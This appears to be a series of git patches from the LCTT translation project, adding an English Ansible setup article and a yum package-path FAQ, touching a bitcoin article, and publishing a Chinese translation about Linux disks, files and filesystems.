-There are various ways of acquiring the bitcoin currency. Some of them include the use of bitcoin mining rigs, purchasing of bitcoins in exchange markets and doing free bitcoin mining online. Purchasing of bitcoins can be done at;
-
-[MtGox][10]
-
-,
-
-[bitNZ][11]
-
-,
-
-[Bitstamp][12]
-
-,
-
-[BTC-E][13]
-
-,
-
-[VertEx][14]
-
-, etc.. Several mining open source applications are available online. These applications include; Bitminter,
-
-[5OMiner][15]
-
-,
-
-[BFG Miner][16]
-
-among others. These applications make use of some graphics card and processor features to generate bitcoins. The efficiency of mining bitcoins on a pc largely depends on the type of graphics card and the processor of the mining rig. Besides, there are many secure online storages for backing up bitcoins. These sites provide bitcoin storage services free of charge. Examples of bitcoin managing sites include;
-
-[xapo][17]
-
-,
-
-[BlockChain][18]
-
-etc. signing up on these sites require a valid email and phone number for verification. Xapo offers additional security through the phone application by requesting for verification whenever a new sign in is made.
+There are various ways of acquiring the bitcoin currency. Some of them include the use of bitcoin mining rigs, purchasing of bitcoins in exchange markets and doing free bitcoin mining online. Purchasing of bitcoins can be done at; [MtGox][10] , [bitNZ][11] , [Bitstamp][12] , [BTC-E][13] , [VertEx][14] , etc.. Several mining open source applications are available online. These applications include; Bitminter, [5OMiner][15] , [BFG Miner][16] among others. These applications make use of some graphics card and processor features to generate bitcoins. The efficiency of mining bitcoins on a pc largely depends on the type of graphics card and the processor of the mining rig. Besides, there are many secure online storages for backing up bitcoins. These sites provide bitcoin storage services free of charge. Examples of bitcoin managing sites include; [xapo][17] , [BlockChain][18] etc. signing up on these sites require a valid email and phone number for verification. Xapo offers additional security through the phone application by requesting for verification whenever a new sign in is made.
### Disadvantages Of Bitcoins
@@ -96,11 +45,7 @@ etc. signing up on these sites require a valid email and phone number for verifi
### Improvements Can be Made
-Based on the infancy of the
-
-[bitcoin technology][19]
-
-, there is still room for changes to make it more secure and reliable. Given more time, the bitcoin currency will be developed enough to provide flexibility as a common currency. For the bitcoin to succeed, many people need to be made aware of it besides being given information on how it works and its benefits.
+Based on the infancy of the [bitcoin technology][19] , there is still room for changes to make it more secure and reliable. Given more time, the bitcoin currency will be developed enough to provide flexibility as a common currency. For the bitcoin to succeed, many people need to be made aware of it besides being given information on how it works and its benefits.
--------------------------------------------------------------------------------
From 6a18c6dd8580e61cfb0d49cf0ea5c357c9f94b98 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:25:33 +0800
Subject: [PATCH 135/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Ansible:=20the=20?=
=?UTF-8?q?Automation=20Framework=20That=20Thinks=20Like=20a=20Sysadmin?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...n Framework That Thinks Like a Sysadmin.md | 200 ++++++++++++++++++
1 file changed, 200 insertions(+)
create mode 100644 sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md
diff --git a/sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md b/sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md
new file mode 100644
index 0000000000..8e0a970f7e
--- /dev/null
+++ b/sources/tech/20180105 Ansible- the Automation Framework That Thinks Like a Sysadmin.md
@@ -0,0 +1,200 @@
+Ansible: the Automation Framework That Thinks Like a Sysadmin
+======
+
+I've written about and trained folks on various DevOps tools through the years, and although they're awesome, it's obvious that most of them are designed from the mind of a developer. There's nothing wrong with that, because approaching configuration management programmatically is the whole point. Still, it wasn't until I started playing with Ansible that I felt like it was something a sysadmin quickly would appreciate.
+
+Part of that appreciation comes from the way Ansible communicates with its client computers—namely, via SSH. As sysadmins, you're all very familiar with connecting to computers via SSH, so right from the word "go", you have a better understanding of Ansible than the other alternatives.
+
+With that in mind, I'm planning to write a few articles exploring how to take advantage of Ansible. It's a great system, but when I was first exposed to it, it wasn't clear how to start. It's not that the learning curve is steep. In fact, if anything, the problem was that I didn't really have that much to learn before starting to use Ansible, and that made it confusing. For example, if you don't have to install an agent program (Ansible doesn't have any software installed on the client computers), how do you start?
+
+### Getting to the Starting Line
+
+The reason Ansible was so difficult for me at first is because it's so flexible with how to configure the server/client relationship, I didn't know what I was supposed to do. The truth is that Ansible doesn't really care how you set up the SSH system; it will utilize whatever configuration you have. There are just a couple things to consider:
+
+1. Ansible needs to connect to the client computer via SSH.
+
+2. Once connected, Ansible needs to elevate privilege so it can configure the system, install packages and so on.
+
+Unfortunately, those two considerations really open a can of worms. Connecting to a remote computer and elevating privilege is a scary thing to allow. For some reason, it feels less vulnerable when you simply install an agent on the remote computer and let Chef or Puppet handle privilege escalation. It's not that Ansible is any less secure, but rather, it puts the security decisions in your hands.
+
+Next I'm going to list a bunch of potential configurations, along with the pros and cons of each. This isn't an exhaustive list, but it should get you thinking along the right lines for what will be ideal in your environment. I also should note that I'm not going to mention systems like Vagrant, because although Vagrant is wonderful for building a quick infrastructure for testing and developing, it's so very different from a bunch of servers that the considerations are too dissimilar really to compare.
+
+### Some SSH Scenarios
+
+1) SSHing into remote computer as root with password in Ansible config.
+
+I started with a terrible idea. The "pros" of this setup is that it eliminates the need for privilege escalation, and there are no other user accounts required on the remote server. But, the cost for such convenience isn't worth it. First, most systems won't let you SSH in as root without changing the default configuration. Those default configurations are there because, quite frankly, it's just a bad idea to allow the root user to connect remotely. Second, putting a root password in a plain-text configuration file on the Ansible machine is mortifying. Really, I mentioned this possibility because it is a possibility, but it's one that should be avoided. Remember, Ansible allows you to configure the connection yourself, and it will let you do really dumb things. Please don't.
+
+2) SSHing into a remote computer as a regular user, using a password stored in the Ansible config.
+
+An advantage of this scenario is that it doesn't require much configuration of the clients. Most users are able to SSH in by default, so Ansible should be able to use credentials and log in fine. I personally dislike the idea of a password being stored in plain text in a configuration file, but at least it isn't the root password. If you use this method, be sure to consider how privilege escalation will take place on the remote server. I know I haven't talked about escalating privilege yet, but if you have a password in the config file, that same password likely will be used to gain sudo access. So with one slip, you've compromised not only the remote user's account, but also potentially the entire system.
+
+3) SSHing into a remote computer as a regular user, authenticating with a key pair that has an empty passphrase.
+
+This eliminates storing passwords in a configuration file, at least for the logging in part of the process. Key pairs without passphrases aren't ideal, but it's something I often do in an environment like my house. On my internal network, I typically use a key pair without a passphrase to automate many things like cron jobs that require authentication. This isn't the most secure option, because a compromised private key means unrestricted access to the remote user's account, but I like it better than a password in a config file.
+
+4) SSHing into a remote computer as a regular user, authenticating with a key pair that is secured by a passphrase.
+
+This is a very secure way of handling remote access, because it requires two different authentication factors: 1) the private key and 2) the passphrase to decrypt it. If you're just running Ansible interactively, this might be the ideal setup. When you run a command, Ansible should prompt you for the private key's passphrase, and then it'll use the key pair to log in to the remote system. Yes, the same could be done by just using a standard password login and not specifying the password in the configuration file, but if you're going to be typing a password on the command line anyway, why not add the layer of protection a key pair offers?
+
+5) SSHing with a passphrase-protected key pair, but using ssh-agent to "unlock" the private key.
+
+This doesn't perfectly answer the question of unattended, automated Ansible commands, but it does make a fairly secure setup convenient as well. The ssh-agent program authenticates the passphrase one time and then uses that authentication to make future connections. When I'm using Ansible, this is what I think I'd like to be doing. If I'm completely honest, I still usually use key pairs without passphrases, but that's typically because I'm working on my home servers, not something prone to attack.
+
+There are some other considerations to keep in mind when configuring your SSH environment. Perhaps you're able to restrict the Ansible user (which is often your local user name) so it can log in only from a specific IP address. Perhaps your Ansible server can live in a different subnet, behind a strong firewall so its private keys are more difficult to access remotely. Maybe the Ansible server doesn't have an SSH server installed on itself so there's no incoming access at all. Again, one of the strengths of Ansible is that it uses the SSH protocol for communication, and it's a protocol you've all had years to tweak into a system that works best in your environment. I'm not a big fan of proclaiming what the "best practice" is, because in reality, the best practice is to consider your environment and choose the setup that fits your situation the best.
+
+### Privilege Escalation
+
+Once your Ansible server connects to its clients via SSH, it needs to be able to escalate privilege. If you chose option 1 above, you're already root, and this is a moot point. But since no one chose option 1 (right?), you need to consider how a regular user on the client computer gains access. Ansible supports a wide variety of escalation systems, but in Linux, the most common options are sudo and su. As with SSH, there are a few situations to consider, although there are certainly other options.
+
+1) Escalate privilege with su.
+
+For Red Hat/CentOS users, the instinct might be to use su in order to gain system access. By default, those systems configure the root password during install, and to gain privileged access, you need to type it in. The problem with using su is that although it gives you total access to the remote system, it also gives you total access to the remote system. (Yes, that was sarcasm.) Also, the su program doesn't have the ability to authenticate with key pairs, so the password either must be interactively typed or stored in the configuration file. And since it's literally the root password, storing it in the config file should sound like a horrible idea, because it is.
+
+2) Escalate privilege with sudo.
+
+This is how Debian/Ubuntu systems are configured. A user in the correct group has access to sudo a command and execute it with root privileges. Out of the box, this still has the problem of password storage or interactive typing. Since storing the user's password in the configuration file seems a little less horrible, I guess this is a step up from using su, but it still gives complete access to a system if the password is compromised. (After all, typing sudo su - will allow users to become root just as if they had the root password.)
+
+3) Escalate privilege with sudo and configure NOPASSWD in the sudoers file.
+
+Again, in my local environment, this is what I do. It's not perfect, because it gives unrestricted root access to the user account and doesn't require any passwords. But when I do this, and use SSH key pairs without passphrases, it allows me to automate Ansible commands easily. I'll note again, that although it is convenient, it is not a terribly secure idea.
+
+4) Escalate privilege with sudo and configure NOPASSWD on specific executables.
+
+This idea might be the best compromise of security and convenience. Basically, if you know what you plan to do with Ansible, you can give NOPASSWD privilege to the remote user for just those applications it will need to use. It might get a little confusing, since Ansible uses Python for lots of things, but with enough trial and error, you should be able to figure things out. It is more work, but does eliminate some of the glaring security holes.
+
+### Implementing Your Plan
+
+Once you decide how you're going to handle Ansible authentication and privilege escalation, you need to set it up. After you become well versed at Ansible, you might be able to use the tool itself to help "bootstrap" new clients, but at first, it's important to configure clients manually so you know what's happening. It's far better to automate a process you're familiar with than to start with automation from the beginning.
+
+I've written about SSH key pairs in the past, and there are countless articles online for setting it up. The short version, from your Ansible computer, looks something like this:
+
+```
+
+# ssh-keygen
+# ssh-copy-id -i .ssh/id_dsa.pub remoteuser@remote.computer.ip
+# ssh remoteuser@remote.computer.ip
+
+```
+
+If you've chosen to use no passphrase when creating your key pairs, that last step should get you into the remote computer without typing a password or passphrase.
+
+In order to set up privilege escalation in sudo, you'll need to edit the sudoers file. You shouldn't edit the file directly, but rather use:
+
+```
+
+# sudo visudo
+
+```
+
+This will open the sudoers file and allow you to make changes safely (it error-checks when you save, so you don't accidentally lock yourself out with a typo). There are examples in the file, so you should be able to figure out how to assign the exact privileges you want.
+
+Once it's all configured, you should test it manually before bringing Ansible into the picture. Try SSHing to the remote client, and then try escalating privilege using whatever methods you've chosen. Once you have configured the way you'll connect, it's time to install Ansible.
+
+### Installing Ansible
+
+Since the Ansible program gets installed only on the single computer, it's not a big chore to get going. Red Hat/Ubuntu systems do package installs a bit differently, but neither is difficult.
+
+In Red Hat/CentOS, first enable the EPEL repository:
+
+```
+
+sudo yum install epel-release
+
+```
+
+Then install Ansible:
+
+```
+
+sudo yum install ansible
+
+```
+
+In Ubuntu, first enable the Ansible PPA:
+
+```
+
+sudo apt-add-repository spa:ansible/ansible
+(press ENTER to access the key and add the repo)
+
+```
+
+Then install Ansible:
+
+```
+
+sudo apt-get update
+sudo apt-get install ansible
+
+```
+
+### Configuring Ansible Hosts File
+
+The Ansible system has no way of knowing which clients you want it to control unless you give it a list of computers. That list is very simple, and it looks something like this:
+
+```
+
+# file /etc/ansible/hosts
+
+[webservers]
+blogserver ansible_host=192.168.1.5
+wikiserver ansible_host=192.168.1.10
+
+[dbservers]
+mysql_1 ansible_host=192.168.1.22
+pgsql_1 ansible_host=192.168.1.23
+
+```
+
+The bracketed sections are specifying groups. Individual hosts can be listed in multiple groups, and Ansible can refer either to individual hosts or groups. This is also the configuration file where things like plain-text passwords would be stored, if that's the sort of setup you've planned. Each line in the configuration file configures a single host, and you can add multiple declarations after the ansible_host statement. Some useful options are:
+
+```
+
+ansible_ssh_pass
+ansible_become
+ansible_become_method
+ansible_become_user
+ansible_become_pass
+
+```
+
+### The Ansible Vault
+
+I also should note that although the setup is more complex, and not something you'll likely do during your first foray into the world of Ansible, the program does offer a way to encrypt passwords in a vault. Once you're familiar with Ansible and you want to put it into production, storing those passwords in an encrypted Ansible vault is ideal. But in the spirit of learning to crawl before you walk, I recommend starting in a non-production environment and using passwordless methods at first.
+
+### Testing Your System
+
+Finally, you should test your system to make sure your clients are connecting. The ping test will make sure the Ansible computer can ping each host:
+
+```
+
+ansible -m ping all
+
+```
+
+After running, you should see a message for each defined host showing a ping: pong if the ping was successful. This doesn't actually test authentication, just the network connectivity. Try this to test your authentication:
+
+```
+
+ansible -m shell -a 'uptime' webservers
+
+```
+
+You should see the results of the uptime command for each host in the webservers group.
+
+In a future article, I plan start to dig in to Ansible's ability to manage the remote computers. I'll look at various modules and how you can use the ad-hoc mode to accomplish in a few keystrokes what would take a long time to handle individually on the command line. If you didn't get the results you expected from the sample Ansible commands above, take this time to make sure authentication is working. Check out [the Ansible docs][1] for more help if you get stuck.
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxjournal.com/content/ansible-automation-framework-thinks-sysadmin
+
+作者:[Shawn Powers][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxjournal.com/users/shawn-powers
+[1]:http://docs.ansible.com
From f4ac557857f17c6c781003e20265c945934c34e1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 13:55:03 +0800
Subject: [PATCH 136/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20yum=20find=20out?=
=?UTF-8?q?=20path=20where=20is=20package=20installed=20to=20on=20CentOS/R?=
=?UTF-8?q?HEL?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... is package installed to on CentOS-RHEL.md | 137 ++++++++++++++++++
1 file changed, 137 insertions(+)
create mode 100644 sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
new file mode 100644
index 0000000000..b0805e08ec
--- /dev/null
+++ b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -0,0 +1,137 @@
+yum find out path where is package installed to on CentOS/RHEL
+======
+
+I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
+
+[yum command][2] is an interactive, open source, rpm based, package manager for a CentOS/RHEL and clones. It can automatically perform the following operations for you:
+
+ 1. Core system file updates
+ 2. Package updates
+ 3. Install a new packages
+ 4. Delete of old packages
+ 5. Perform queries on the installed and/or available packages
+
+yum is similar to other high level package managers like [apt-get command][3]/[apt command][4].
+
+### yum where is package installed
+
+The syntax is as follows to install htop package for a demo purpose:
+`# yum install htop`
+To list the files installed by a yum package called htop, run the following rpm command:
+```
+# rpm -q {packageNameHere}
+# rpm -ql htop
+```
+Sample outputs:
+```
+/usr/bin/htop
+/usr/share/doc/htop-2.0.2
+/usr/share/doc/htop-2.0.2/AUTHORS
+/usr/share/doc/htop-2.0.2/COPYING
+/usr/share/doc/htop-2.0.2/ChangeLog
+/usr/share/doc/htop-2.0.2/README
+/usr/share/man/man1/htop.1.gz
+/usr/share/pixmaps/htop.png
+
+```
+
+### How to see the files installed by a yum package using repoquery command
+
+First install yum-utils package using [yum command][2]:
+```
+# yum install yum-utils
+```
+Sample outputs:
+
+```
+Resolving Dependencies
+--> Running transaction check
+---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
+--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
+--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
+--> Running transaction check
+---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
+---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+=======================================================================================
+ Package Arch Version Repository Size
+=======================================================================================
+Installing:
+ yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
+Installing for dependencies:
+ libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
+ python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
+
+Transaction Summary
+=======================================================================================
+Install 1 Package (+2 Dependent packages)
+
+Total download size: 630 k
+Installed size: 3.1 M
+Is this ok [y/d/N]: y
+Downloading packages:
+(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
+(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
+(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
+---------------------------------------------------------------------------------------
+Total 1.0 MB/s | 630 kB 00:00
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+ Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
+ Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
+ Installing : yum-utils-1.1.31-42.el7.noarch 3/3
+ Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
+ Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
+ Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
+
+Installed:
+ yum-utils.noarch 0:1.1.31-42.el7
+
+Dependency Installed:
+ libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
+
+Complete!
+```
+
+
+### How do I list the contents of a installed package using YUM?
+
+Now run repoquery command as follows:
+`# repoquery --list htop`
+OR
+`# repoquery -l htop`
+Sample outputs:
+[![yum where is package installed][5]][5]
+You can also use the type command or command command to just find location of given binary file such as httpd or htop:
+`$ type -a httpd
+$ type -a htop
+$ command -V htop`
+
+### about the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][6], [Facebook][7], [Google+][8].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
+
+作者:[][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
+[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
+[6]:https://twitter.com/nixcraft
+[7]:https://facebook.com/nixcraft
+[8]:https://plus.google.com/+CybercitiBiz
From 19488e521e09dd1dc92abe1768d8df30591603cb Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 16:00:47 +0800
Subject: [PATCH 137/371] PRF&PUB:20171127 Migrating to Linux Disks Files and
Filesystems.md
@qhwdw
---
...ng to Linux Disks Files and Filesystems.md | 113 +++++++++++++++
...ng to Linux Disks Files and Filesystems.md | 135 ------------------
2 files changed, 113 insertions(+), 135 deletions(-)
create mode 100644 published/20171127 Migrating to Linux Disks Files and Filesystems.md
delete mode 100644 translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md
diff --git a/published/20171127 Migrating to Linux Disks Files and Filesystems.md b/published/20171127 Migrating to Linux Disks Files and Filesystems.md
new file mode 100644
index 0000000000..96af33242f
--- /dev/null
+++ b/published/20171127 Migrating to Linux Disks Files and Filesystems.md
@@ -0,0 +1,113 @@
+迁移到 Linux:磁盘、文件、和文件系统
+============================================================
+
+![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ")
+
+> 在你的主要桌面计算机上安装和使用 Linux 将帮你快速熟悉你需要的工具和方法。
+
+这是我们的迁移到 Linux 系列文章的第二篇。如果你错过了第一篇,[你可以在这里找到它][4]。就如之前提到过的,为什么要迁移到 Linux 的有几个原因。你可以在你的工作中为 Linux 开发和使用代码,或者,你可能只是想去尝试一下新事物。
+
+不论是什么原因,在你主要使用的桌面计算机上拥有一个 Linux,将帮助你快速熟悉你需要的工具和方法。在这篇文章中,我将介绍 Linux 的文件、文件系统和磁盘。
+
+### 我的 C:\ 在哪里?
+
+如果你是一个 Mac 用户,Linux 对你来说应该非常熟悉,Mac 使用的文件、文件系统、和磁盘与 Linux 是非常接近的。另一方面,如果你的使用经验主要是 Windows,访问 Linux 下的磁盘可能看上去有点困惑。一般,Windows 给每个磁盘分配一个盘符(像 C:\)。而 Linux 并不是这样。而在你的 Linux 系统中它是一个单一的文件和目录的层次结构。
+
+让我们看一个示例。假设你的计算机使用了一个主硬盘、一个有 `Books` 和 `Videos` 目录的 CD-ROM 、和一个有 `Transfer` 目录的 U 盘,在你的 WIndows 下,你应该看到的是下面的样子:
+
+```
+C:\ [硬盘]
+├ System
+├ System32
+├ Program Files
+├ Program Files (x86)
+└ <更多目录>
+
+D:\ [CD-ROM]
+├ Books
+└ Videos
+
+E:\ [U 盘]
+└ Transfer
+```
+
+而一个典型的 Linux 系统却是这样:
+
+```
+/ (最顶级的目录,称为根目录) [硬盘]
+├ bin
+├ etc
+├ lib
+├ sbin
+├ usr
+├ <更多目录>
+└ media
+ └ <你的用户名>
+ ├ cdrom [CD-ROM]
+ │ ├ Books
+ │ └ Videos
+ └ Kingme_USB [U 盘]
+ └ Transfer
+```
+
+如果你使用一个图形化环境,通常,Linux 中的文件管理器将出现看起来像驱动器的图标的 CD-ROM 和 USB 便携式驱动器,因此,你根本就无需知道介质所在的目录。
+
+### 文件系统
+
+Linux 称这些东西为文件系统。文件系统是在介质(比如,硬盘)上保持跟踪所有的文件和目录的一组结构。如果没有用于存储数据的文件系统,我们所有的信息就会混乱,我们就不知道哪个块属于哪个文件。你可能听到过一些类似 ext4、XFS 和 Btrfs 之类的名字,这些都是 Linux 文件系统。
+
+每种保存有文件和目录的介质都有一个文件系统在上面。不同的介质类型可能使用了为它优化过的特定的文件系统。比如,CD-ROM 使用 ISO9660 或者 UDF 文件系统类型。USB 便携式驱动器一般使用 FAT32,以便于它们可以很容易去与其它计算机系统共享。
+
+Windows 也使用文件系统。不过,我们不会过多的讨论它。例如,当你插入一个 CD-ROM,Windows 将读取 ISO9660 文件系统结构,分配一个盘符给它,然后,在盘符(比如,D:\)下显示文件和目录。当然,如果你深究细节,从技术角度说,Windows 是分配一个盘符给一个文件系统,而不是整个驱动器。
+
+使用同样的例子,Linux 也读取 ISO9660 文件系统结构,但它不分配盘符,它附加文件系统到一个目录(这个过程被称为挂载)。Linux 将随后在所挂载的目录(比如是, `/media//cdrom` )下显示 CD-ROM 上的文件和目录。
+
+因此,在 Linux 上回答 “我的 C:\ 在哪里?” 这个问题,答案是,这里没有 C:\,它们工作方式不一样。
+
+### 文件
+
+Windows 将文件和目录(也被称为文件夹)存储在它的文件系统中。但是,Linux 也让你将其它的东西放到文件系统中。这些其它类型的东西是文件系统的原生的对象,并且,它们和普通文件实际上是不同的。除普通文件和目录之外,Linux 还允许你去创建和使用硬链接、符号链接、命名管道、设备节点、和套接字。在这里,我们不展开讨论所有的文件系统对象的类型,但是,这里有几种经常使用到的需要知道。
+
+硬链接用于为文件创建一个或者多个别名。指向磁盘上同样内容的每个别名的名字是不同的。如果在一个文件名下编辑文件,这个改变也同时出现在其它的文件名上。例如,你有一个 `MyResume_2017.doc`,它还有一个被称为 `JaneDoeResume.doc` 的硬链接。(注意,硬链接是从命令行下,使用 `ln` 的命令去创建的)。你可以找到并编辑 `MyResume_2017.doc`,然后,然后找到 `JaneDoeResume.doc`,你发现它保持了跟踪 —— 它包含了你所有的更新。
+
+符号链接有点像 Windows 中的快捷方式。文件系统的入口包含一个到其它文件或者目录的路径。在很多方面,它们的工作方式和硬链接很相似,它们可以创建一个到其它文件的别名。但是,符号链接也可以像文件一样给目录创建一个别名,并且,符号链接可以指向到不同介质上的不同文件系统,而硬链接做不到这些。(注意,你可以使用带 `-s` 选项的 `ln` 命令去创建一个符号链接)
+
+### 权限
+
+ Windows 和 Linux 另一个很大的区别是涉及到文件系统对象(文件、目录、及其它)的权限。Windows 在文件和目录上实现了一套非常复杂的权限。例如,用户和用户组可以有权限去读取、写入、运行、修改等等。用户和用户组可以授权访问除例外以外的目录中的所有内容,也可以不允许访问除例外的目录中的所有内容。
+
+然而,大多数使用 Windows 的人并不会去使用特定的权限;因此,当他们发现在 Linux 上是强制使用一套默认权限时,他们感到非常惊讶!Linux 通过使用 SELinux 或者 AppArmor 可以强制执行一套更复杂的权限。但是,大多数 Linux 安装版都只是使用了内置的默认权限。
+
+在默认的权限中,文件系统中的每个条目都有一套为它的文件所有者、文件所在的组、和其它人的设置的权限。这些权限允许他们:读取、写入和运行。给它们的权限是有层次继承的。首先,它检查这个(登入的)用户是否为该文件所有者和拥有的权限。如果不是,然后检查这个用户是否在文件所在的组中和该组拥有的权限。如果不是,然后它再检查其它人拥有的权限。这里设置了其它人的权限。但是,这里设置的三套权限大多数情况下都会使用其中的一套。
+
+如果你使用命令行,你输入 `ls -l`,你可以看到如下所表示的权限:
+
+```
+rwxrw-r-- 1 stan dndgrp 25 Oct 33rd 25:01 rolldice.sh
+```
+
+最前面的字母,`rwxrw-r--`,展示了权限。在这个例子中,所有者(stan)可以读取、写入和运行这个文件(前面的三个字母,`rwx`);dndgrp 组的成员可以读取和写入这个文件,但是不能运行(第二组的三个字母,`rw-`);其它人仅可以读取这个文件(最后的三个字母,`r--`)。
+
+(注意,在 Windows 中去生成一个可运行的脚本,你生成的文件要有一个特定的扩展名,比如 `.bat`,而在 Linux 中,扩展名在操作系统中没有任何意义。而是需要去设置这个文件可运行的权限)
+
+如果你收到一个 “permission denied” 错误,可能是你去尝试运行了一个要求管理员权限的程序或者命令,或者你去尝试访问一个你的帐户没有访问权限的文件。如果你尝试去做一些要求管理员权限的事,你必须切换登入到一个被称为 `root` 的用户帐户。或者通过在命令行使用一个被称为 `sudo` 的辅助程序。它可以临时允许你以 `root` 权限运行。当然,`sudo` 工具,也会要求你输入密码,以确保你真的有权限。
+
+### 硬盘文件系统
+
+Windows 主要使用一个被称为 NTFS 的硬盘文件系统。在 Linux 上,你也可以选一个你希望去使用的硬盘文件系统。不同的文件系统类型呈现不同的特性和不同的性能特征。现在主流的原生 Linux 的文件系统是 Ext4。但是,在安装 Linux 的时候,你也有丰富的文件系统类型可供选择,比如,Ext3(Ext4 的前任)、XFS、Btrfs、UBIFS(用于嵌入式系统)等等。如果你不确定要使用哪一个,Ext4 是一个很好的选择。
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
+
+作者:[JOHN BONESIO][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/johnbonesio
+[1]:https://www.linux.com/licenses/category/creative-commons-zero
+[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
+[3]:https://www.linux.com/files/images/butterflies-8075511920jpg
+[4]:https://linux.cn/article-9212-1.html
diff --git a/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md b/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md
deleted file mode 100644
index 438b27a222..0000000000
--- a/translated/tech/20171127 Migrating to Linux Disks Files and Filesystems.md
+++ /dev/null
@@ -1,135 +0,0 @@
-迁移到 Linux:磁盘、文件、和文件系统
-============================================================
-
-![Migrating to LInux ](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/butterflies-807551_1920.jpg?itok=pxTxwvFO "Migrating to LInux ")
-在你的主要桌面上安装和使用 Linux 将帮你快速熟悉你需要的工具和方法。[Creative Commons Zero][1]Pixabay
-
-这是我们的迁移到 Linux 系列文章的第二篇。如果你错过了第一篇,[你可以在这里找到它][4]。以前提到过,为什么要迁移到 Linux 的几个原因。你可以在你的工作中为 Linux 开发和使用代码,或者,你可能是正想去尝试一下新事物。
-
-不论是什么原因,拥有一个 Linux 的主桌面,将帮助你快速熟悉你需要的工具和方法。在这篇文章中,我将介绍 Linux 的文件、文件系统和磁盘。
-
-### 我的 C:\ 在哪里?
-
-如果你是一个 Mac 用户,Linux 对你来说应该非常熟悉,Mac 使用的文件、文件系统、和磁盘与 Linux 是非常接近的。另一方面,如果你的使用经验主要是 Windows,访问 Linux 下的磁盘可能看上去有点困惑。一般,Windows 给每个磁盘分配一个盘符(像 C:\)。而 Linux 并不是这样。而在你的 Linux 系统中它是一个单一的文件和目录的层次结构。
-
-让我们看一个示例。假设你的计算机使用了一个主硬盘、一个有 _Books_ 和 _Videos_ 目录的 CD-ROM 、和一个有 _Transfer_ 目录的 U 盘,在你的 WIndows 下,你应该看到的是下面的样子:
-
-```
-C:\ [Hard drive]
-
-├ System
-
-├ System32
-
-├ Program Files
-
-├ Program Files (x86)
-
-└
-
-D:\ [CD-ROM]
-
-├ Books
-
